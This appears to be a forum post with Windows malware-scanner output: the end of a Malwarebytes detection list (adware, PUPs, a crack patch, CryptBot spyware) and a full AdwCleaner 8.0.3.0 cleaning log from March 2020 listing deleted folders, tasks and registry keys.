RiskWare.Packed.Themida, C:\PROGRAMDATA\ERRORRESPONDER\ERRORRESPONDER.EXE, Se eliminará al reiniciar, 7487, 804571, 1.0.21478, , ame, 
Adware.Linkury.TskLnk, C:\USERS\MARCO AVILA\APPDATA\LOCAL\INSTALLATIONCONFIGURATION.XML, Se eliminará al reiniciar, 14988, 444923, 1.0.21478, , ame, 
Adware.Linkury.TskLnk, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\INSTALLATIONCONFIGURATION.XML, Se eliminará al reiniciar, 14988, 444922, 1.0.21478, , ame, 
HackTool.FilePatch, C:\USERS\MARCO AVILA\APPDATA\ROAMING\MOVAVI VIDEO CONVERTER 19 PREMIUM\PATCH-MOVAVI.VIDEO.CONVERTER.PREMIUM.19.X-ASTRON.EXE, Se eliminará al reiniciar, 7540, 281135, 1.0.21478, , ame, 
PUP.Optional.Carambis, C:\USERS\MARCO AVILA\APPDATA\ROAMING\RVFECDXS.EXE, Se eliminará al reiniciar, 2898, 726630, 1.0.21478, , ame, 
MachineLearning/Anomalous.100%, C:\USERS\MARCO AVILA\APPDATA\ROAMING\ERGFEEFVG.EXE, Se eliminará al reiniciar, 0, 392687, 1.0.21478, , shuriken, 
Spyware.CryptBot.Generic, C:\USERS\MARCO AVILA\APPDATA\ROAMING\RGFWEDWSAX.EXE, Se eliminará al reiniciar, 10525, 800679, 1.0.21478, 000000000000000000000003, dds, 00650839
Adware.Csdimonetize, C:\PROGRAM FILES (X86)\ORCHESTRALE\29515953.EXE, Se eliminará al reiniciar, 2943, 804330, 1.0.21478, 56B52D84717E9D9837697FD1, dds, 00650839
Adware.Csdimonetize, C:\PROGRAM FILES (X86)\MARS\281505898.EXE, Se eliminará al reiniciar, 2943, 804330, 1.0.21478, 56B52D84717E9D9837697FD1, dds, 00650839
Adware.Linkury, C:\USERS\MARCO AVILA\APPDATA\LOCAL\SUNTECH.BIN, Se eliminará al reiniciar, 424, 504848, 1.0.21478, , ame, 
Generic.Malware/Suspicious, C:\WINDOWS\[email protected], Se eliminará al reiniciar, 0, 392686, 1.0.21478, , shuriken, 

Sector físico: 0
(No hay elementos maliciosos detectados)

WMI: 0
(No hay elementos maliciosos detectados)


(end)

Marco · 28 Marzo, 2020 02:34

# -------------------------------
# Malwarebytes AdwCleaner 8.0.3.0
# -------------------------------
# Build:    03-03-2020
# Database: 2020-03-23.1 (Cloud)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    03-27-2020
# Duration: 00:00:26
# OS:       Windows 7 Home Premium
# Cleaned:  65
# Failed:   0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

Deleted       C:\Program Files (x86)\Common Files\IObit\Advanced SystemCare V8
Deleted       C:\ProgramData\IObit\Advanced SystemCare V7
Deleted       C:\ProgramData\IObit\Advanced SystemCare V8
Deleted       C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft\WebCompanion
Deleted       C:\Users\ASPNET\AppData\Local\torch
Deleted       C:\Users\Administrador\AppData\Local\torch
Deleted       C:\Users\HomeGroupUser$\AppData\Local\torch
Deleted       C:\Users\Invitado\AppData\Local\torch
Deleted       C:\Users\MARCO AVILA\AppData\LocalLow\IObit\Advanced SystemCare V8
Deleted       C:\Users\MARCO AVILA\AppData\Local\VirtualStore\ProgramData\Speedbit
Deleted       C:\Users\MARCO AVILA\AppData\Roaming\IObit\Advanced SystemCare
Deleted       C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare V8
Deleted       C:\Windows\rss

***** [ Files ] *****

Deleted       C:\END
Deleted       C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\searchplugins\yahoo-lavasoft.xml

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

Deleted       C:\Windows\System32\Tasks\FreeDownloadManagerNetworkMonitor
Deleted       C:\Windows\System32\Tasks\PRODUCT UPDATER

***** [ Registry ] *****

Deleted       HKCU\Software\Lavasoft\Web Companion
Deleted       HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
Deleted       HKCU\Software\PRODUCTSETUP
Deleted       HKCU\Software\ProductSetup\Uninstall\0B2U2Z1P0F1P1G1R1P1V0A1Q1Q0O1G
Deleted       HKCU\Software\ProductSetup\Uninstall\0S1P1T1C1R1MtT0P1C1F2X1L1Q1P1QtT1S2UtT0Y1T1M1F1F
Deleted       HKCU\Software\win
Deleted       HKLM\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Advanced SystemCare
Deleted       HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shellex\ContextMenuHandlers\Advanced SystemCare
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{45BDE75E-7158-40F8-BE0E-4EDAA215FCBF}
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{45BDE75E-7158-40F8-BE0E-4EDAA215FCBF}
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7D310AAB-358D-447D-BDBB-005B3CD5F610}
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FreeDownloadManagerNetworkMonitor
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Product Updater
Deleted       HKLM\Software\Applian Technologies
Deleted       HKLM\Software\Wow6432Node\Applian Technologies
Deleted       HKLM\Software\Wow6432Node\IObit\RealTimeProtector
Deleted       HKLM\Software\Wow6432Node\Lavasoft\Web Companion

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

Deleted       findit
Deleted       findit

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

Deleted       Preinstalled.AcerIdentityCard   Folder   C:\Program Files (x86)\ACER\IDENTITY CARD
Deleted       Preinstalled.AcerIdentityCard   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\Identity Card
Deleted       Preinstalled.AcerPowerManagement   Registry   HKLM\Software\Microsoft\Windows\CurrentVersion\Run|Acer ePower Management
Deleted       Preinstalled.AcerRegistration   Folder   C:\Program Files (x86)\ACER\REGISTRATION
Deleted       Preinstalled.AcerRegistration   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\Acer Registration
Deleted       Preinstalled.AcerUpdater   Folder   C:\Program Files\ACER\ACER UPDATER
Deleted       Preinstalled.AcerUpdater   Folder   C:\ProgramData\ACER\ACER UPDATER
Deleted       Preinstalled.AcerVideoConferenceManager   Folder   C:\Program Files (x86)\ACER\ACER VCM
Deleted       Preinstalled.AcerVideoConferenceManager   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{047F790A-7A2A-4B6A-AD02-38092BA63DAC}
Deleted       Preinstalled.GatewayMyBackup   Folder   C:\Program Files (x86)\NEWTECH INFOSYSTEMS
Deleted       Preinstalled.GatewayMyBackup   Folder   C:\Users\MARCO AVILA\AppData\Local\NEWTECH INFOSYSTEMS
Deleted       Preinstalled.GatewayMyBackup   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|BackupManagerTray
Deleted       Preinstalled.GatewayMyBackup   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{12EFA1A4-AC3B-443C-8143-237EDE760403}
Deleted       Preinstalled.GatewayMyBackup   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{2413930C-8309-47A6-BC61-5EF27A4222BC}
Deleted       Preinstalled.GatewayMyBackup   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{72B776E5-4530-4C4B-9453-751DF87D9D93}
Deleted       Preinstalled.GatewayMyBackup   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{12EFA1A4-AC3B-443C-8143-237EDE760403}
Deleted       Preinstalled.GatewayMyBackup   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{2413930C-8309-47A6-BC61-5EF27A4222BC}
Deleted       Preinstalled.GatewayMyBackup   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{72B776E5-4530-4C4B-9453-751DF87D9D93}
Deleted       Preinstalled.GatewayWelcomeCenter   File   C:\Users\Administrador.MAAH-PC\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Welcome Center.lnk
Deleted       Preinstalled.PackardBellGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110209593}
Deleted       Preinstalled.PackardBellGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110551697}
Deleted       Preinstalled.PackardBellGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-112662477}
Deleted       Preinstalled.PackardBellGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11273477}
Deleted       Preinstalled.PackardBellGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-112920767}
Deleted       Preinstalled.PackardBellGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113786380}
Deleted       Preinstalled.PackardBellGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113832110}
Deleted       Preinstalled.PackardBellGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-115053100}
Deleted       Preinstalled.PackardBellGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11531173}
Deleted       Preinstalled.PackardBellPowerManagement   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{3DB0448D-AD82-4923-B305-D001E521A964}


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [8676 octets] - [27/03/2020 19:21:26]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########